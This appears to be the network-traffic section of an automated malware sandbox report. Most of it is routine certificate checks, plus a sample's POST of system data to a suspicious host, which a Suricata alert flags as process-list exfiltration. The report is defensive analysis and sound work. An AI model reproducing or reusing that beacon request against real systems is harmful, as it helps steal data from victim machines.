Network Analysis
- TCP Requests
-
-
192.168.56.103:49603 117.18.237.29:80ocsp.digicert.com
-
192.168.56.103:49604 117.18.237.29:80ocsp.digicert.com
-
192.168.56.103:49605 117.18.237.29:80ocsp.digicert.com
-
192.168.56.103:49607 117.18.237.29:80ocsp.digicert.com
-
192.168.56.103:49600 182.162.106.50:80
-
192.168.56.103:49608 185.176.43.98:80alyssalove.getenjoyment.net
-
192.168.56.103:49606 23.37.139.27:80sv.symcd.com
-
192.168.56.103:49598 23.74.19.27:80sv.symcd.com
-
192.168.56.103:49599 23.74.19.27:80sv.symcd.com
-
192.168.56.103:49601 23.74.19.27:80sv.symcd.com
-
192.168.56.103:49602 23.74.19.27:80sv.symcd.com
-
- UDP Requests
-
-
192.168.56.103:55444 164.124.101.2:53
-
192.168.56.103:56376 164.124.101.2:53
-
192.168.56.103:56508 164.124.101.2:53
-
192.168.56.103:57259 164.124.101.2:53
-
192.168.56.103:58285 164.124.101.2:53
-
192.168.56.103:58575 164.124.101.2:53
-
192.168.56.103:58935 164.124.101.2:53
-
192.168.56.103:59012 164.124.101.2:53
-
192.168.56.103:62079 164.124.101.2:53
-
192.168.56.103:62494 164.124.101.2:53
-
192.168.56.103:64714 164.124.101.2:53
-
192.168.56.103:65511 164.124.101.2:53
-
192.168.56.103:137 192.168.56.255:137
-
192.168.56.103:138 192.168.56.255:138
-
192.168.56.103:1900 239.255.255.250:1900
-
192.168.56.103:49152 239.255.255.250:3702
-
192.168.56.103:50368 239.255.255.250:1900
-
52.231.114.183:123 192.168.56.103:123
-
GET
200
http://ocsp.verisign.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBS56bKHAoUD%2BOyl%2B0LhPg9JxyQm4gQUf9Nlp8Ld7LvwMAnzQzn6Aq8zMTMCEGxZ76nhAOEO4wa6j%2BApJVk%3D
REQUEST
RESPONSE
BODY
GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBS56bKHAoUD%2BOyl%2B0LhPg9JxyQm4gQUf9Nlp8Ld7LvwMAnzQzn6Aq8zMTMCEGxZ76nhAOEO4wa6j%2BApJVk%3D HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: ocsp.verisign.com
HTTP/1.1 200 OK
Server: nginx
Content-Type: application/ocsp-response
Content-Length: 1561
Cache-Control: public, max-age=86400
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Date: Tue, 08 Jun 2021 07:36:55 GMT
Connection: keep-alive
GET
200
http://evcs-ocsp.ws.symantec.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQckPwgwK2Thdm9JYVwXQ4ERz3XDQQUo47PGUI9MeGrIYmEbcvZeaKysloCEFDtZ0JVYUv07T7UI8yTyn0%3D
REQUEST
RESPONSE
BODY
GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBQckPwgwK2Thdm9JYVwXQ4ERz3XDQQUo47PGUI9MeGrIYmEbcvZeaKysloCEFDtZ0JVYUv07T7UI8yTyn0%3D HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: evcs-ocsp.ws.symantec.com
HTTP/1.1 200 OK
Server: nginx
Content-Type: application/ocsp-response
Content-Length: 1533
Cache-Control: public, max-age=86400
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Date: Tue, 08 Jun 2021 07:37:00 GMT
Connection: keep-alive
GET
200
http://crl.microsoft.com/pki/crl/products/microsoftrootcert.crl
REQUEST
RESPONSE
BODY
GET /pki/crl/products/microsoftrootcert.crl HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: crl.microsoft.com
HTTP/1.1 200 OK
Content-Length: 767
Content-Type: application/pkix-crl
Content-MD5: aHL66CiNs0IH2efuNQFX9A==
Last-Modified: Fri, 07 May 2021 05:00:53 GMT
ETag: 0x8D91115179E37D7
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 9cdb17c9-f01e-008e-7d07-4308d1000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Tue, 08 Jun 2021 07:37:04 GMT
Connection: keep-alive
GET
200
http://s2.symcb.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBS56bKHAoUD%2BOyl%2B0LhPg9JxyQm4gQUf9Nlp8Ld7LvwMAnzQzn6Aq8zMTMCED141%2Fl2SWCyYX308B7Khio%3D
REQUEST
RESPONSE
BODY
GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBS56bKHAoUD%2BOyl%2B0LhPg9JxyQm4gQUf9Nlp8Ld7LvwMAnzQzn6Aq8zMTMCED141%2Fl2SWCyYX308B7Khio%3D HTTP/1.1
Cache-Control: max-age = 497683
Connection: Keep-Alive
Accept: */*
If-Modified-Since: Sun, 01 Nov 2020 00:00:59 GMT
User-Agent: Microsoft-CryptoAPI/6.1
Host: s2.symcb.com
HTTP/1.1 200 OK
Server: nginx
Content-Type: application/ocsp-response
Content-Length: 1561
Cache-Control: public, max-age=86400
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Date: Tue, 08 Jun 2021 07:37:10 GMT
Connection: keep-alive
GET
200
http://sv.symcd.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQe6LNDJdqx%2BJOp7hVgTeaGFJ%2FCQgQUljtT8Hkzl699g%2B8uK8zKt4YecmYCEBLwJ34PIzs5%2BUGbBujN41I%3D
REQUEST
RESPONSE
BODY
GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBQe6LNDJdqx%2BJOp7hVgTeaGFJ%2FCQgQUljtT8Hkzl699g%2B8uK8zKt4YecmYCEBLwJ34PIzs5%2BUGbBujN41I%3D HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: sv.symcd.com
HTTP/1.1 200 OK
Server: nginx
Content-Type: application/ocsp-response
Content-Length: 1519
Cache-Control: public, max-age=86400
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Date: Tue, 08 Jun 2021 07:37:14 GMT
Connection: keep-alive
GET
200
http://sv.symcb.com/sv.crl
REQUEST
RESPONSE
BODY
GET /sv.crl HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: sv.symcb.com
HTTP/1.1 200 OK
Accept-Ranges: bytes
Age: 52718
Cache-Control: max-age=172800
Content-Type: application/pkix-crl
Date: Tue, 08 Jun 2021 07:37:15 GMT
Expires: Thu, 10 Jun 2021 07:37:15 GMT
Last-Modified: Mon, 07 Jun 2021 16:58:37 GMT
Server: ECS (tkb/7356)
X-Cache: HIT
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Content-Length: 94589
GET
200
http://crl.verisign.com/pca3.crl
REQUEST
RESPONSE
BODY
GET /pca3.crl HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: crl.verisign.com
HTTP/1.1 200 OK
Accept-Ranges: bytes
Age: 23627
Cache-Control: max-age=172800
Content-Type: application/pkix-crl
Date: Tue, 08 Jun 2021 07:37:15 GMT
Etag: "6088ef0c-5ca"
Expires: Thu, 10 Jun 2021 07:37:15 GMT
Last-Modified: Wed, 28 Apr 2021 05:13:48 GMT
Server: ECS (tkb/73A4)
X-Cache: HIT
Content-Length: 1482
GET
200
http://ocsp.verisign.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ%2FxkCfyHfJr7GQ6M658NRZ4SHo%2FAQUCPVR6Pv%2BPT1kNnxoz1t4qN%2B5xTcCECcNdVyfWsO322H1CZgocHg%3D
REQUEST
RESPONSE
BODY
GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ%2FxkCfyHfJr7GQ6M658NRZ4SHo%2FAQUCPVR6Pv%2BPT1kNnxoz1t4qN%2B5xTcCECcNdVyfWsO322H1CZgocHg%3D HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: ocsp.verisign.com
HTTP/1.1 200 OK
Server: nginx
Content-Type: application/ocsp-response
Content-Length: 5
Cache-Control: public, max-age=300
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Date: Tue, 08 Jun 2021 07:37:19 GMT
Connection: keep-alive
GET
200
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBT3xL4LQLXDRDM9P665TW442vrsUQQUReuir%2FSSy4IxLVGLp6chnfNtyA8CEAQJGBtf1btmdVNDtW%2BVUAg%3D
REQUEST
RESPONSE
BODY
GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBT3xL4LQLXDRDM9P665TW442vrsUQQUReuir%2FSSy4IxLVGLp6chnfNtyA8CEAQJGBtf1btmdVNDtW%2BVUAg%3D HTTP/1.1
Cache-Control: max-age = 107819
Connection: Keep-Alive
Accept: */*
If-Modified-Since: Sun, 01 Nov 2020 11:33:00 GMT
If-None-Match: "5f9e9cec-1d7"
User-Agent: Microsoft-CryptoAPI/6.1
Host: ocsp.digicert.com
HTTP/1.1 200 OK
Accept-Ranges: bytes
Age: 3073
Cache-Control: max-age=100959
Content-Type: application/ocsp-response
Date: Tue, 08 Jun 2021 07:37:24 GMT
Etag: "60bdf993-1d7"
Expires: Wed, 09 Jun 2021 11:40:03 GMT
Last-Modified: Mon, 07 Jun 2021 10:48:51 GMT
Server: ECS (tkb/7377)
X-Cache: HIT
Content-Length: 471
GET
200
http://ocsp.verisign.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ%2FxkCfyHfJr7GQ6M658NRZ4SHo%2FAQUCPVR6Pv%2BPT1kNnxoz1t4qN%2B5xTcCECcNdVyfWsO322H1CZgocHg%3D
REQUEST
RESPONSE
BODY
GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ%2FxkCfyHfJr7GQ6M658NRZ4SHo%2FAQUCPVR6Pv%2BPT1kNnxoz1t4qN%2B5xTcCECcNdVyfWsO322H1CZgocHg%3D HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: ocsp.verisign.com
HTTP/1.1 200 OK
Server: nginx
Content-Type: application/ocsp-response
Content-Length: 5
Cache-Control: public, max-age=300
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Date: Tue, 08 Jun 2021 07:37:24 GMT
Connection: keep-alive
GET
200
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTfqhLjKLEJQZPin0KCzkdAQpVYowQUsT7DaQP4v0cB1JgmGggC72NkK8MCEAx5qUSwjBGVIJJhX%2BJrHYM%3D
REQUEST
RESPONSE
BODY
GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBTfqhLjKLEJQZPin0KCzkdAQpVYowQUsT7DaQP4v0cB1JgmGggC72NkK8MCEAx5qUSwjBGVIJJhX%2BJrHYM%3D HTTP/1.1
Cache-Control: max-age = 156719
Connection: Keep-Alive
Accept: */*
If-Modified-Since: Mon, 02 Nov 2020 01:03:00 GMT
If-None-Match: "5f9f5ac4-1d7"
User-Agent: Microsoft-CryptoAPI/6.1
Host: ocsp.digicert.com
HTTP/1.1 200 OK
Accept-Ranges: bytes
Age: 4854
Cache-Control: max-age=151336
Content-Type: application/ocsp-response
Date: Tue, 08 Jun 2021 07:37:29 GMT
Etag: "60beb76b-1d7"
Expires: Thu, 10 Jun 2021 01:39:45 GMT
Last-Modified: Tue, 08 Jun 2021 00:18:51 GMT
Server: ECS (tkb/7377)
X-Cache: HIT
Content-Length: 471
GET
200
http://ocsp.verisign.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ%2FxkCfyHfJr7GQ6M658NRZ4SHo%2FAQUCPVR6Pv%2BPT1kNnxoz1t4qN%2B5xTcCEDA2ePYtKPWPCdFq3RW5wHE%3D
REQUEST
RESPONSE
BODY
GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ%2FxkCfyHfJr7GQ6M658NRZ4SHo%2FAQUCPVR6Pv%2BPT1kNnxoz1t4qN%2B5xTcCEDA2ePYtKPWPCdFq3RW5wHE%3D HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: ocsp.verisign.com
HTTP/1.1 200 OK
Server: nginx
Content-Type: application/ocsp-response
Content-Length: 5
Cache-Control: public, max-age=300
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Date: Tue, 08 Jun 2021 07:37:32 GMT
Connection: keep-alive
GET
200
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSnR4FoxLLkI7vkvsUIFlZt%2BlGH3gQUWsS5eyoKo6XqcQPAYPkt9mV1DlgCEA3etT%2BVczf76vmMSmFbFJ0%3D
REQUEST
RESPONSE
BODY
GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBSnR4FoxLLkI7vkvsUIFlZt%2BlGH3gQUWsS5eyoKo6XqcQPAYPkt9mV1DlgCEA3etT%2BVczf76vmMSmFbFJ0%3D HTTP/1.1
Cache-Control: max-age = 165702
Connection: Keep-Alive
Accept: */*
If-Modified-Since: Mon, 02 Nov 2020 03:15:00 GMT
If-None-Match: "5f9f79b4-1d7"
User-Agent: Microsoft-CryptoAPI/6.1
Host: ocsp.digicert.com
HTTP/1.1 200 OK
Accept-Ranges: bytes
Age: 6440
Cache-Control: max-age=160834
Content-Type: application/ocsp-response
Date: Tue, 08 Jun 2021 07:37:33 GMT
Etag: "60bed657-1d7"
Expires: Thu, 10 Jun 2021 04:18:07 GMT
Last-Modified: Tue, 08 Jun 2021 02:30:47 GMT
Server: ECS (tkb/7377)
X-Cache: HIT
Content-Length: 471
GET
200
http://ocsp.verisign.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ%2FxkCfyHfJr7GQ6M658NRZ4SHo%2FAQUCPVR6Pv%2BPT1kNnxoz1t4qN%2B5xTcCEDA2ePYtKPWPCdFq3RW5wHE%3D
REQUEST
RESPONSE
BODY
GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ%2FxkCfyHfJr7GQ6M658NRZ4SHo%2FAQUCPVR6Pv%2BPT1kNnxoz1t4qN%2B5xTcCEDA2ePYtKPWPCdFq3RW5wHE%3D HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: ocsp.verisign.com
HTTP/1.1 200 OK
Server: nginx
Content-Type: application/ocsp-response
Content-Length: 5
Cache-Control: public, max-age=300
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Date: Tue, 08 Jun 2021 07:37:37 GMT
Connection: keep-alive
GET
200
http://sv.symcd.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQe6LNDJdqx%2BJOp7hVgTeaGFJ%2FCQgQUljtT8Hkzl699g%2B8uK8zKt4YecmYCEADzAwdvBip42MYbURaknTY%3D
REQUEST
RESPONSE
BODY
GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBQe6LNDJdqx%2BJOp7hVgTeaGFJ%2FCQgQUljtT8Hkzl699g%2B8uK8zKt4YecmYCEADzAwdvBip42MYbURaknTY%3D HTTP/1.1
Cache-Control: max-age = 369537
Connection: Keep-Alive
Accept: */*
If-Modified-Since: Fri, 30 Oct 2020 12:25:34 GMT
User-Agent: Microsoft-CryptoAPI/6.1
Host: sv.symcd.com
HTTP/1.1 200 OK
Server: nginx
Content-Type: application/ocsp-response
Content-Length: 1519
Cache-Control: public, max-age=86400
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Date: Tue, 08 Jun 2021 07:37:38 GMT
Connection: keep-alive
GET
200
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSnR4FoxLLkI7vkvsUIFlZt%2BlGH3gQUWsS5eyoKo6XqcQPAYPkt9mV1DlgCEAwVvkoVuwkDyQGx1sJlMC8%3D
REQUEST
RESPONSE
BODY
GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBSnR4FoxLLkI7vkvsUIFlZt%2BlGH3gQUWsS5eyoKo6XqcQPAYPkt9mV1DlgCEAwVvkoVuwkDyQGx1sJlMC8%3D HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: ocsp.digicert.com
HTTP/1.1 200 OK
Accept-Ranges: bytes
Age: 6113
Cache-Control: max-age=150400
Content-Type: application/ocsp-response
Date: Tue, 08 Jun 2021 07:37:41 GMT
Etag: "60beaee4-1d7"
Expires: Thu, 10 Jun 2021 01:24:21 GMT
Last-Modified: Mon, 07 Jun 2021 23:42:28 GMT
Server: ECS (tkb/72AF)
X-Cache: HIT
Content-Length: 471
GET
200
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSnR4FoxLLkI7vkvsUIFlZt%2BlGH3gQUWsS5eyoKo6XqcQPAYPkt9mV1DlgCEAM%2B1e2gZdG4yR38%2BSpsm9g%3D
REQUEST
RESPONSE
BODY
GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBSnR4FoxLLkI7vkvsUIFlZt%2BlGH3gQUWsS5eyoKo6XqcQPAYPkt9mV1DlgCEAM%2B1e2gZdG4yR38%2BSpsm9g%3D HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: ocsp.digicert.com
HTTP/1.1 200 OK
Accept-Ranges: bytes
Age: 2290
Cache-Control: max-age=95474
Content-Type: application/ocsp-response
Date: Tue, 08 Jun 2021 07:37:46 GMT
Etag: "60bde74a-1d7"
Expires: Wed, 09 Jun 2021 10:09:00 GMT
Last-Modified: Mon, 07 Jun 2021 09:30:50 GMT
Server: ECS (tkb/72AF)
X-Cache: HIT
Content-Length: 471
POST
403
http://alyssalove.getenjoyment.net/0423/v.php?ki87ujhy=%ProgramFiles(x86)%&rdxvdw=C:\Program%20Files
REQUEST
RESPONSE
BODY
POST /0423/v.php?ki87ujhy=%ProgramFiles(x86)%&rdxvdw=C:\Program%20Files HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Language: ko
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Content-Length: 1883
Host: alyssalove.getenjoyment.net
HTTP/1.1 403 Forbidden
Date: Tue, 08 Jun 2021 07:37:45 GMT
Server: Apache
Vary: Host
Last-Modified: Wed, 19 Sep 2012 23:44:44 GMT
ETag: "7a-4ca1697571300"
Accept-Ranges: bytes
Content-Length: 122
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
ICMP traffic
No ICMP traffic performed.
IRC traffic
No IRC requests performed.
Suricata Alerts
| Flow | SID | Signature | Category |
|---|---|---|---|
| TCP 192.168.56.103:49608 -> 185.176.43.98:80 | 2027117 | ET HUNTING Suspicious POST with Common Windows Process Names - Possible Process List Exfiltration | A Network Trojan was detected |
Suricata TLS
No Suricata TLS
Snort Alerts
No Snort Alerts